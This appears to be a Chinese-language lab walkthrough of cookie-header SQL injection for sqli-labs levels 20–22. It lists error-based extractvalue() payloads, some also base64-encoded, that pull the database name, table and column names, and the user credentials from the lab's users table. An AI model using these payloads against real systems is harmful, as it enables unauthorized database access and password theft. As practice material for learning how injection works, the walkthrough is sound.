Cookie
Cookie注入 跟 其他Header注入 有一点不同
Cookie:浏览器向服务器发送请求时发送cookie,或者服务器向浏览器附加cookie,就是将cookie附近在这里的。例如:Cookie:user=admin
源代码如果你设置了Cookie,那么就会执行下面的语句
不会执行:
Less-20
登入一个账号,Hackbar LOAD命令 或 Burp Suite抓包
闭合字符:'$cookee'
查询当前数据库:
Dumb' or extractvalue(1,concat(0x7e,database())) #
#uname=Dumb 这个可以随便填,不会影响到 extractvalue()
查询当前数据库下的表:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
查询当前表的字段:
Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
查询数据:
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
Less-21
base64_decode(),对其进行 base64解码
登入一个账号,Hackbar LOAD命令,先把 %3D url解码(从网页上取来的)再base64解码,即 Dumb
闭合字符:('$uname')
查询当前数据库:
Dumb') or extractvalue(1,concat(0x7e,database())) #
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj
查询当数据库的表:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj
查询当前表的字段:
Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==
查询数据:
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...
base64:
Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj
dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=
Less-22
改变了闭合字符
登入一个账号,Hackbar LOAD命令 或 Burp Suite抓包,RHVtYg%3D%3D,=(url编码%3D),即Dumb
这里给跳回 Less-21,地址栏的文件名变了 LEss-22
闭合字符:"$cookee1"
查询当前数据库:
Dumb" or extractvalue(1,concat(0x7e,database())) #
base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==
查询当前数据库的表:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #
base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==
查询当前表的字段:
Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #
base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj
查询数据:
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...
base64:
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==